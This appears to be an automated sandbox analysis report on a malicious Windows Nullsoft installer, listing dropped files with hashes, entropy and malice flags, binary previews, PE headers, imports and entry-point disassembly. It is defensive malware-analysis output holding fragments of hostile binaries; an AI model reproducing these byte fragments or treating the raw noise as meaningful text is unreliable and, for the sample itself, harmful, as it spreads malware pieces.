              Preview:...C.......|.7$.JF...=.W.P6:. .J.c.WsP..I..3Es...g.....u.C.$.....B...8;........7iW.l6n...6...e.....-.3.Kcd(..Q..{e..<&..#...[..s..%"v..IbR?...J........B.T...j.Q ..0....t.5..oo.........<.N.*.........P.B..w....+..mzcg.d(........4p....?/Z..d5J....F.86..Y.....ue...:{...~.c....ca....)..B..3...e..k.7....>....>S.Qn...`...i.=".s..$vA.>b..=..{&.~.;.........Ynx..q7-...:..&...}ad%..i...z...B.O'..2*...r.[......T./..J}{.....i........AO!.^x).U;.5.!...N..%{...w3..0|...M%...-5E..-..q.h..g..#......J.5.b.....*.....e.KtG..... .3.#,....$.dz..p..p...C.s..%.O..bh.).3.#.`........-.....o.W.s.j...."....;......HV..#.hRi..-M.h..o...QR.Y=..o40.E...r....R..7..+...K.........fU.._qZ.ny. &...a.1....!I:.....S}jU...J".....3U.T.........b2t..).cv.d...Kk/...T....O.....e@<.p..zMl$.:Z...].......j..y<...M..y...O`#fb....pI...n.(W..pM.3.*e).W..F..@.8........-[3\.z.Cx- ..z..P..G..0..^r....#.....{.r[@AW.."..Y.,.em%...g~ Xy.Aeed.. .n..........`R..f2U....Z...3.F.'.._S..k.G....v
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):1022
              Entropy (8bit):3.530108892384297
              Encrypted:false
              SSDEEP:12:cNJtpxSGSGciuwSV3OcvC2Peiz3CH2VxgGskmXXUYzEvt+:4p4GSHitcnq2Pz3CWV2GPmUYQvs
              MD5:8C7664EE643017421C4D703C970A0810
              SHA1:73B72515BC6CB734B0BDEC85437D7547FB0C1CF0
              SHA-256:E5588D932A3A243B12DFAA9BFDA491980842188C70C06A3C52E6EB0B6BB8608A
              SHA-512:4CCB256B2A0E9799601D5A99EB68C7FB02355A883763E98B270896181846753E3EE14B0E128F61DFFBC4AF909C8A063022F7B04043606F4C78EACAC771989686
              Malicious:false
              Preview:MaskBathroomCompositionInjection..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B..............................................................................................................................................................................
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):82944
              Entropy (8bit):7.997698095829368
              Encrypted:true
              SSDEEP:1536:e1HR5egLElRnLnezBWkArnoADA2E30EgBnr1C5PA3C+Sv9cvNJd1QX3pa:eDkTlRnmBW1rJ1EELJ1sP6+qrDeI
              MD5:2346A38B2E273FF30A9D18C753F6DE07
              SHA1:F4DED0078C5B4E20BFD2648154A8780C4077A456
              SHA-256:4D0C4FC236C9FD9CC72D28E8FAEE1EDF39BF7AD6E774A78342C8EA71010573D8
              SHA-512:5A7F6D78378D2D28A7D19698EFDF2BFCB9BE6FD066E1E144F19D8A34D1B1DCD569121D63DA6E66BC53BD485BBBC2C49D0132EA5A49D8CC73F9710AE3AEC1055F
              Malicious:true
              Preview:..X.....DZ?C..3kV<6...].(-f.9..Xg..5Z......J..H......<.....a?..l.7/k.?..q~.t.N.1.*4,Y.3.?..6.eP@.....7.vN..Dk...w.3..t9......W..pu.\n.|.l5Kej-vtj0...{.....a.......(._[...E......7,.P`.i.h.^.....n....._C.w.?,f...&../.~`.....R.3')..emhl<..BA9..:.....c....KmC`.%P..x..Z.;`..S.X......~Q$.d...^.M..U.....,.#u.1y.k.....7...f.B...y..T...hS....Q".a.qc....9dG.....U..|I.Bx.....x..:.W.n...Q.8.uL..h.]....5...x...Q#....Z.b....I.G...a.^...Gf=wk.....k.G........h.1F...@...........C.y.}.[.l..[ q......em+F....4...x......#W.(.."!..N.......W...8..wg.-..!N.......Dc......q2h...~@.a....B...&..0M...t..C`..x._:A*O....~\.9'.......G...)..!.i.=....#.H......]....AZL.,.>n...k.!..2Q.L%.EN.....dr..1.......sM.1.I......IB).Z.;...z.WPd4.=..Mx..{n...f..(.M.....m...R.m.*.....B...!t..n.f...`.1...Gh.B7.....\".{..6?..$.6..9....yxK.].?.."..h ..^.t........D...'.+.L..x#..L.q..ZH..V!8..:..4X..r.....w.s{5Iu..B..L,..V........Z....r.J.....2.FBAb.W.y.x...Y...)C/...kI.......N...Z.s.S.^.
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):58368
              Entropy (8bit):7.9966284847393885
              Encrypted:true
              SSDEEP:768:nzviMs4Zz2+GYSziSnYAjRiHsRpiboZzQWiZE1jPOuUcYjlf8ItxHn6pni5YAV+A:DeKzfGRziSYJMAMQ8jPOpchCAotVjGBM
              MD5:377283970D6B60D8EF7371017F398780
              SHA1:9F193E58BB429464C4DB7815CEE77D5BE2D63749
              SHA-256:C0C5C230D205D762AD6925C9E9F1C82A0504281CDEFF378E2FA2DE19F7405C28
              SHA-512:F8AA114F216A6E0FA8FC472A85FB9D39781A21E7D9E1BBF9B5D7CB79E4ED8A2BC04F30E2AE4EB4430662DA5E046407C16E63BEF6FEED24731FA696FDB9F391F5
              Malicious:true
              Preview:=e..<p..cC]E...0.r..XK.D/...T.!.B..a...Z..r..w|*..n..4..{..n....V..".i.D..&i....t....{.^>M$..yy.......C..i..N..Y.....>..{...N.....)..[a.@.kJ.....m...b.<..c&....d...x...<I.P.....22..<.G..N..j....4<.F..)j.....}...|E.....2.......qL....BZ#..[!^....r.....g...L}.>...NJH..V..;j./P.<...k.h..t[..........S-......A......H.Q.=}.K..D.aH.)-.YA.......%s..S......[..06..EC...%.7mS......F.G......@/...."......D..T\.'.KQlAt.J:^.....w.In.h.C....ue.F..s.d...T..e.Q:;.GSV....AnpWP.....m.AO.-ma.......J.....Q..a......1/...e..Tt..u.-Y......Y.{[e.M..O.S.....*h.Q{yD..`J\/...]...?....}|..W.-..U.+.PE.n.Z....NY...-_..H...7.?.......f..p.U.3...L.S.Y^..eW....sh.Xa._.....[...rF.X..........H`9...\.!&d....-5.VA\(P.R..G'..T6......o.0.G.`Py."..g.Y,.....%..."...8).....o.....0/p@4....K.U.=...O.D.......bR$6..A.lnk.r....'ll.WV.L=[.>1U."<o2v.\^.......j..,.....).qi...y1..0cn.....gy.iPJ.1.*u..'8...l.."0...]....r\...tYxr.,.....*..V...2....._<.i4.....v.~.X.R.C..Pf.Y.).....M.Ec.40..
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):1064140
              Entropy (8bit):6.439726841092861
              Encrypted:false
              SSDEEP:24576:JAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:JALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
              MD5:814A4C38BD3E7D17927C132FD6BE882D
              SHA1:9025F9305DC25E162060C31AB8FDCCDF568DF4F3
              SHA-256:364F4CE6D551C14F1000A6E6353296B5E784387A6BA8DF5C3A0F47649F7C2985
              SHA-512:61FC9DDB2ED0B49BD613BEBAE345BA1D0F3B8BFFFBB47F67997EFD7F0042AE10D1CA5464E52BE8FFC26A74DDD3AF06C9262203893F99400E4838CBDE140742BD
              Malicious:false
              Preview:....................................H..(H.......0J..H......H..(.4=..H.......(=..H..(..'..H..x...H..(..=.....H..(..9..H..d...H..(..<.....H..(.<..H..P...H..(..<.....H..(H..e...HcP.H..Z...H....:..H..+...H..(.<....H..(..7..H......H..(.<.....H..(..0..H......H..(.o<.....H..(.SK..H......H..(.S<.....H..(._...H......H..(.7<.....H..(H....... ...H.....H..(..<..H.\$.UVWATAUAVAWH..`H.Z....3...$.....l$PM....$....H..H.t$XL..D..D..H........H...v.H.G.H.H0.(...D..H...v.H.G.H.H(.......H...v.H.O.H.I .......$....H...v.H.O.H.I.......D$PH...v.H.O.H.I........$....H...v.H.O.H.I.....D..H.O.H..H...(...H.D$XH.K.D..$....D.D$PH.D$@..$....H..D.d$8.l$0.D$(D.l$ ....H........H..I...H...A.F.....3.I.6H..$....H..`A_A^A]A\_^]....H.\$.H.t$.WH..@3.I..H.z..H.......H.K.H.......D..E3...3.D$8.D$0H.|$(.D$ .....H..........3.H.\$P.F.....H.t$XH..@_.H.\$.H.l$.VH.. 3.H.A.....H.)H..H.i.....i.H.i(.q0H.i8H.i@H..H.....H......f.kh.Cj.H.kl.s|.......................................H...........U...L......H..........U .........
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):73728
              Entropy (8bit):7.997261740056317
              Encrypted:true
              SSDEEP:1536:D8/RV1mOHCz8BATYsWig+v7zrns+Mz/jllq2Of9Nt:IZ3X1VsWi9/s+0LPDOf9Nt
              MD5:B1C6DA290068DCD40A18C1BC49189EE9
              SHA1:F9885BE86C07FF96D43234EDD773B035035B36CF
              SHA-256:3ECA627685B19D1B508AC7A4D63AA35FBE6BF113571C61D1E7237DC190A55C51
              SHA-512:EDF8A13CD6D8677052F46084B4F372DE7FBF72E924204CCD2CF86873C3BD25B0F3D96B647A87B71C49968EA138FB6DE6741FECEA999148DDC77ED7871226344E
              Malicious:true
              Preview:.h......_IwZPWS.~....z....... .hAR.....UZ....h..p...zb.*.K".B.....k.a.n.....WD.....zS.....7..I..T9q.T,s<yD]E.....az~`{.IUh...#-.Yh.`..~D.3.....r.........eo....;..J%.,..N!.~[.......@.W...[..............rs-..(.4.~\..!....5.{....9....<p...^.....^g..\...Q...{?...'.{...........#.......8...J....*.o...#.m..`..j.x......I]f.......M9\.7...%P./.X.@..oi.....*(KS.jr.$..4..R..{<.nt.9O.....~......U...B.1....|..._...........<'.y.;"....'....y~#H.O..ZN...C9..X........)O.[#...Q...m.-u.......^Hq.C.T.4.$.]Y.....F.Q.F}bz4.t..:.;..._........z.2V.....n.`.......9.......8...)(.`...'YX......{.....(..`g8.r.....u.3^.D'*M.d.Y.I..Nq..3f.&...dT..z...0.....v@../...L.L....nY.5wB.j...Y.[.O.s!N+r...A..y7.z...l,B....q..).../.1f-.V=|....2....Acy+.#..;s..|a.8K..3Oz.0....L...@.f.....C....T...QxoN..l..n.XE...^=.Y.......y.WE.~.w@l..TE*..#......P......... ..>..bP....%2S..Z,..e.,......*......9v..XU/.]D.....(.s..q[.F...(,...e.X4...$_a.......e...j.........p....+..........~....Y...&.
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:SysEx File - Casio
              Category:dropped
              Size (bytes):96256
              Entropy (8bit):7.997930512621656
              Encrypted:true
              SSDEEP:1536:lFrwS3X8MnqhwRGcYDBjd7rWT9xhdqwfw+7aJFl0y8GWG6SfTvdS+FizXxt+d1tU:jgh8GjHo9xf1fcFl0YRTrQCf6sa
              MD5:E78BEDBC8F2BA8212C13FA11EC970FD2
              SHA1:7E0D85EF797744B6ED2CE4DD200EE5E58B670C68
              SHA-256:4604236A20247E8F9346AA352DFB240CB550AD0CD1A96CDD23DD364B36357FBC
              SHA-512:C09C5B116F119EAD2699CFC4E7ED59C78DBA95A3E6577C05EB4B82D109C04FFB6029359150DDBD5B8DA860ED8A838C568EA845887AD0F298692FA51FA1348AC5
              Malicious:true
              Preview:.DS{.)."....-....I].GI|>..0m...,.n...".^.'...l../h....M.K/.W......+t....i..,..t.>&>l.C..{...p....7..."J.>3..... \.(.J.@.Q.\....Z2.7.Z\..;.g>.C...:#..2Y..}.3.C0.#f0\..<.lgxq.oU...@.........a?...m.k.._/W.c.&Rp..u.D=6......0.....R..0...|ra...ZA..l%G....o.....:....u;..*..R....LF!..z.s.f..4ha;.... .).@..........I...3.3fr.ei.(..8......wD...*7.../..C.L+g>.>.H.o...:...6.A/N.....`4V.i.U-..:...-\..DE.....i.wN.5...%V...y..n.....{......-...y...u...9.e...g>...O....D......<.;.0].a.7...o.%e`.......W..B..mZ...z.7..#..E.....*p.R.sf.6.W.J..o....m..B.:.7..N...q]......(...< ...Ur:.....~.....Q..hqP..~.d.KtT6r...).>.........s'....._...mf37.A>...3._....g.C8,V.gd.?i.!...Dx..........H-...9..z_..K..Mbw...:...P...`V4...>B..Q....:...V...b..>4.e...... ..........+`Ah+=j&{...[Z.,.+.2.[...3..VZ...K`.rW=g.+.._..h.7LM.6Ld.....b.]j...Y..~....mi..,1...}..o..o,...J..-...''.........(....$.._..7.$.....f..bo/........x.%....F..2.K......q|..R.....%..#..T...[mW....v)
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):69632
              Entropy (8bit):7.997491195832333
              Encrypted:true
              SSDEEP:1536:ZnumNW06s8Mpi4iczEBjV2AHKhB1otCRMamawqa2hLyWq:gIWzYi4iczER9HK1ECRdmawrgLE
              MD5:8EB31452FC71D6705F49585FB70A99B1
              SHA1:7EC047C13954774C901A071B2A6785B8CB6941C9
              SHA-256:26B595C679D843BD50CE39C6DE1CFFC5BAABD595B66EC0686BE9A905A38777CB
              SHA-512:5FCC7E47317A4EDAE29B39E5FA1002778AE82BF02D4A97EE298A4F028CF02CE183D02F14B55FEB867D9350F1C81B62E643FF651D260167E58ABFE5D4DB07FBAF
              Malicious:true
              Preview:|....x&....P>..<.%..@.`..(h.6...4...P.(|.a(]..=.M3..UI..X..Ic<._A|..2...+...e.y...E*..2f.&....-..Q..@K.z.s..w.&6...5..{.WX....F....Uj..l0.4...:.7..S..s}Ns..b.X.....#...;.g...z.x$..?.....5T...).......y^7.O..]/.^K....{^...H.6i..;qW=..-}.'.....HL.r....i4..<.....`.uR6.e*.m..~.I..=...q.-.+R.4C.AUJT}].A..Z/..r.'[9..gyt.... .'kt........Z.cx....`...m...\..[{)E.1.i.g.~U*.nlxW$...&.7./G7%....;2f`..U@...NW.!..]...8....^m&6&l..>.....Wru.:..._..[...M8...U...&Zz_.../...K.I.....}.&m^~./k..:P..dn.+F3v.tp...........k.V...N...#.OY\8)F.T@..m=.;.....h-...D..I.4).S.%.t9K....1;"W.:A......^.....r....>.|.Q4^$"...............v.!.+f..*<.3..........<.d......Pj\.."..a..+.#.z.5..r......3Fe.M......z#.u..*.U...Px.i.ba..(....1|..?.hJ.jj-..J..V.2....!.y.........[Pb.zU..0..U1....z..{/.'...Dr.6.7..h..D..../;] b$..L.s...tr..?..b4....w.....t.P;.1b...EQ.............z()..n%u-..l......m[).Q.L.=..Y..;.{8A.."^...I.`...PZ.HI..J.....|....$3..OG..%$0.<}z.j2..mlmZ.]q!5.w..I..
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):81920
              Entropy (8bit):7.997727452482501
              Encrypted:true
              SSDEEP:1536:uDsBS/pORcHC9k95vSjC4qQ7EKpq1kt78wPMmoNqau1Nq5RvGO1bN9PzJHHe5:u/OR+dKxq1ktA/VNyTqPvGO1bN9PzJs
              MD5:98299EB5E90AA1A7D6CF5BDB829E3872
              SHA1:081ED2D78FA1D4BB8FD8F31F861323DAD5534C49
              SHA-256:A1050FBFF70B206021A797773F9ACC047B3151DC52EF3BED10D6B28AE7C66554
              SHA-512:44215DCC775A5C0E3BF654D2052C73085D5AC168032C2813382EAA87EBC919160E905AB132BF483257FE62D89C86B40FDC46EA782EF5FCF26C45F77AD5D4C5A1
              Malicious:true
              Preview:.>......Qd/6l.Uk..d..wS.P..k0..r....N....y[.*.F...L....;...J..b.W......24P...y..F.e.h ........P...<g..*..Ku.....M.....[.i.G........O....g.-....B......s...^.@1..6....*.TN.....@..U....Z..]....D..D.._y../..t..J....V%aH.3E.E.&.x...q...PT.b&.|.....m.`f].=....k......d..1>..W....o..n#...^!q%.Q.;].Y..5....q...".....R.(}.m...3.]...0O.Y......6N.;..d....X.8......(s....~CPk...9...OU..a.#G..B.]..Zu.@.2@N..Y..{|W..y2..W........!4[.N..e.b:....B...}6....'.B....HB..=.s.?...X..~....,..(n.z......?....A./]^TP...pAd.J...)+..k..F...h.b..ZB.r.0........D.....c}N..@.]...V..4IC.......}.7Z......#..g..3<...C..a}R~....j...$....nQs.X..n...X...Y.V....'P...Sq..**..x...w.#..jx%+a...Rp.i..A.H..R....\m...F.G%...l.K..\.7SWfG.:.........,.....&~........>.2_..1"...n.....Y.S..v*...[&./..Fn........3>i....c..../+e..v.....N8.C...-.+.x2.,3..*......M~I3.v..'...2W[]KC...)...A9..*..dS......#....,|.Z.}[...7.a.G...}^.E^.S .Sf.R.....g.B.gL......'E..a...K.c.u.......yiO..vi...r.e<.l
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):54272
              Entropy (8bit):7.996646849887946
              Encrypted:true
              SSDEEP:1536:Bzl18XkLg9MM/YOQYe/+EPgxvh7AB8nEt:1Lg9Mk1e/+E4z7Ab
              MD5:F87009BFB39149D32AF82E0146CDE3B7
              SHA1:C4FAED10F201924FE6A30B9C6AE42265B943D424
              SHA-256:FC8E5A71410CDA9E50E18B3A2080C6391A36ED4C26AFFA1AC178C44C97C1B65B
              SHA-512:B5EF875C716F739B508D3315A67C2053C0D8C5AE2F818A1C2E53DB7BB1CF086636C4DB1F7116FA43C2790BE06B7C307A86F530C4C479A8EEEF74DC35219845E0
              Malicious:true
              Preview:../#...I.........0_~.Q......].BP....s..i..v....C.......73..&!.....`.M.v.V.D;...MQ....v.w?wZ.He....D.S..I._*@..z.m.D....B.w.6./e.i@ux....8..Ka.G..&t!...,....-..9....Zt...8O.]..9......Iv...K.......-..o..........i...|....D...7BfVV` .UmlT4..q>..5..;J5....0$..A2^....3Nv(...c..=O.1..!x. ..<H5AC.>.......V....!....:.=:Hbeq.-.F.u$%&..._.H."...2.af,.K(..VO.`...2..i.I23!!.).OEW>....)..yGMK.>...... .4..*Zy...>!...`e.....".+1....u.W 1....@D..Y.h.f)...P.~G.H.}Qn..$8..f.....D.b..#..7.....t.T..1L.0I7....S.79....Z...1.{.q.I..;.<......6LU.z..@.g/..v ......S..&....o..8.......}=..../...~.R.Sw.Y..8...."..]......,.qM.@>..!@...>....D+h.w.sZ+.a<..'.(....1.........&.B....g..?.....v<.J..:...d:z.; ..c.j7Q..|r........4......hh.:$..6k"..?..5}EFg.o...P..Wa.A.kBMo..$f....8...IJ....i.4..{.-...x.;..bJt..<Q....nP..].3;.....,......s....~...A.:.t...lc..d...kR......B../VX.$.`.".>.}...).>..q.L..xq....3mBO?.y..Hd.Gu....5.....> I.Y.7...I..|.k..5(+..@...Q.....y..W....D.
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):76800
              Entropy (8bit):7.997267792102631
              Encrypted:true
              SSDEEP:1536:x1C2pHGCprwRfp/ise1pbGp+7EKp+8/Rst4XREh+3dxMsNoyvBhelpZCx:FdGCWRYse1pqOEKpTZBhEh+vNo+hI2x
              MD5:54DD729C1B5F4E3588FE8552FCC661E8
              SHA1:FF83067BCE2D5D57A6CD5731992196043B42DDA7
              SHA-256:4C05689E573BFEFA7473996F77C0BA935650CC7D361A38A4BA889432866B7D7D
              SHA-512:D7192A9ADF72C1789476B1BF44BF7ADA47BA1E29649E23B4B6B838F9FE984EC3C3D82CF569E3D1C6AC640D1FAF16FAFD466C3079853670248C611FCD060D8771
              Malicious:true
              Preview:i.j..N'.7..zm.^.u.|..5...-.lAsO..........G..X.. <...f...Ps.?|.%(eBwR ..../..g....3......r.....H.l...q.FV`.f+4~$.><n6..i_.n....]..S..=..%P......=.<.....E*.z.X...JNES....Gs2n.. &.5.a....6..S.y..L..v...t.ya.1lA...7....<.D......f.6$F.t0...u.....Z......C.....?.r....0{.....p.D3tmE.@(.l=..| .wm+.Q.h...m...g.:Z.n..l..=......z......5.........Q.i.[f...f.....y5.7f...wx.2.$.c.3.>E0.9..2.b#..?..x.N....L/..S.Tl.&|....z.|.|.,..S..M..<{......)..no....:.......7Gt..!....].pm9.q...N.^.....A.N.....xk...A...{. .'...;E?]..sCI....d...n...............w.l.pE..i>.>.@i.$(...#`).h6|<EmNI.P..gc$..b...\..F.z".U..........KS.N(.Sx.....D%.xe7.$.!3.s%\n..n...P.=v.)......$..P.r.{.. .q/[.@.`GY.% .>....o..x....r..2..nM......TXE....!.Y...!.$O.N...<.`.,.....v....~dQO....Q...F...Z.r.v..j..\...R(^[.......S.]..-.....?......T.1EQ...k......X.W.r...H....]...]2.e.Lw..R......|..LRug.)W.L......... .%i.\...$rzo.........N...n..Ag!... W.F.;..<0......._..i>...ea.;....$.z.V...h..E.
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.30838613676383
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.83%
              • Windows Screen Saver (13104/52) 0.13%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:wWk9NkXYcL.exe
              File size:23'265'280 bytes
              MD5:3a1ccc44a0aa6f397c3b2eacf6d4c526
              SHA1:62d0b00435893cae171ddf6b2b5d964f608db84e
              SHA256:e606e3e72dfaabb3b398d7f7b2b221675038da19080c69c41bd3005066d94f50
              SHA512:4373ae343d6f6c4f84359f8d879a6d4b1275e9245762fc592ef7feace7257b95843775c13c48f8d1a2abdeaf8449f5f4103938fc2527fac26efbb316968b3b08
              SSDEEP:196608:Z8VG/O42OzpufDGQVegTH0DdR4gTH0DdR4gTH0DdR4gTH0DdR4gTH0DdR4gTH0Ds:Z8EOVGpiFVgQQQQQQ
              TLSH:FA372393C32708B1F57D903A08B6BA338E2E55DF7221959A67CF0BFFB149EC5059A424
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7...7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h.
              Icon Hash:6062e0e2d8c4fc08
              Entrypoint:0x403415
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x4BC06CDA [Sat Apr 10 12:19:38 2010 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:bf95d1fc1d10de18b32654b123ad5e1f
              Signature Valid:
              Signature Issuer:
              Signature Validation Error:
              Error Number:
              Not Before, Not After
                Subject Chain
                  Version:
                  Thumbprint MD5:
                  Thumbprint SHA-1:
                  Thumbprint SHA-256:
                  Serial:
                  Instruction
                  sub esp, 000002D4h
                  push ebx
                  push ebp
                  push esi
                  push edi
                  push 00000020h
                  xor ebp, ebp
                  pop esi
                  mov dword ptr [esp+18h], ebp
                  mov dword ptr [esp+10h], 00408570h
                  mov dword ptr [esp+14h], ebp
                  call dword ptr [00408030h]
                  push 00008001h
                  call dword ptr [004080B4h]
                  push ebp
                  call dword ptr [004082B0h]
                  push 00000008h
                  mov dword ptr [0047B398h], eax
                  call 00007F7668EECC6Ch
                  push ebp
                  push 000002B4h
                  mov dword ptr [0047B2B0h], eax
                  lea eax, dword ptr [esp+38h]
                  push eax
                  push ebp
                  push 0040856Ch
                  call dword ptr [00408180h]
                  push 00408554h
                  push 004732A0h
                  call 00007F7668EECB3Ah
                  call dword ptr [004080B0h]
                  push eax
                  mov edi, 004CC0A0h
                  push edi
                  call 00007F7668EECB28h
                  push ebp
                  call dword ptr [00408130h]
                  cmp word ptr [004CC0A0h], 0022h
                  mov dword ptr [0047B2B8h], eax
                  mov eax, edi
                  jne 00007F7668EEA50Ah
                  push 00000022h
                  pop esi
                  mov eax, 004CC0A2h
                  push esi
                  push eax
                  call 00007F7668EEC7FCh
                  push eax
                  call dword ptr [00408250h]
                  mov esi, eax
                  mov dword ptr [esp+1Ch], esi
                  jmp 00007F7668EEA591h
                  push 00000020h
                  pop ebx
                  cmp ax, bx
                  jne 00007F7668EEA509h
                  inc esi
                  inc esi
                  cmp word ptr [esi], bx
                  je 00007F7668EEA4FBh
                  Programming Language:
                  • [ C ] VS2005 build 50727
                  • [IMP] VS2005 build 50727
                  • [ C ] VS2008 SP1 build 30729
                  • [LNK] VS2008 SP1 build 30729
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8afc | 0xb4 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfd000 | 0x4a168 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2e7902 | 0x31c0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2c0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x671c | 0x6800 | 8bb8f6dca80ad27cbdbce9816ab6ae7c | False | 0.6644381009615384 | data | 6.50478910452928 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8000 | 0x19d6 | 0x1a00 | 161b329b4c70ce4fbd9c1143e738896b | False | 0.4480168269230769 | data | 5.026839717718007 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xa000 | 0x7139c | 0x200 | 140876ba314e7bc36379ee5c6db80876 | False | 0.271484375 | data | 1.7360077526852977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .ndata | 0x7c000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0xfd000 | 0x4a168 | 0x4a200 | 6045c79daf0df2fcc23695e835aa8ed3 | False | 0.14129360771500843 | data | 3.8002785037819753 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0xfd208 | 0x44028 | Device independent bitmap graphic, 256 x 512 x 32, image size 278528 | English | United States | 0.11365627064127969
                  RT_ICON | 0x141230 | 0x5638 | Device independent bitmap graphic, 72 x 144 x 32, image size 22032 | English | United States | 0.4416908300108735
                  RT_DIALOG | 0x146868 | 0x100 | data | English | United States | 0.5234375
                  RT_DIALOG | 0x146968 | 0x11c | data | English | United States | 0.6056338028169014
                  RT_DIALOG | 0x146a88 | 0x60 | data | English | United States | 0.7291666666666666
                  RT_GROUP_ICON | 0x146ae8 | 0x22 | data | English | United States | 0.9411764705882353
                  RT_VERSION | 0x146b10 | 0x380 | data | English | United States | 0.4419642857142857
                  RT_MANIFEST | 0x146e90 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
                  DLL | Import
                  KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, MulDiv, lstrlenA, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
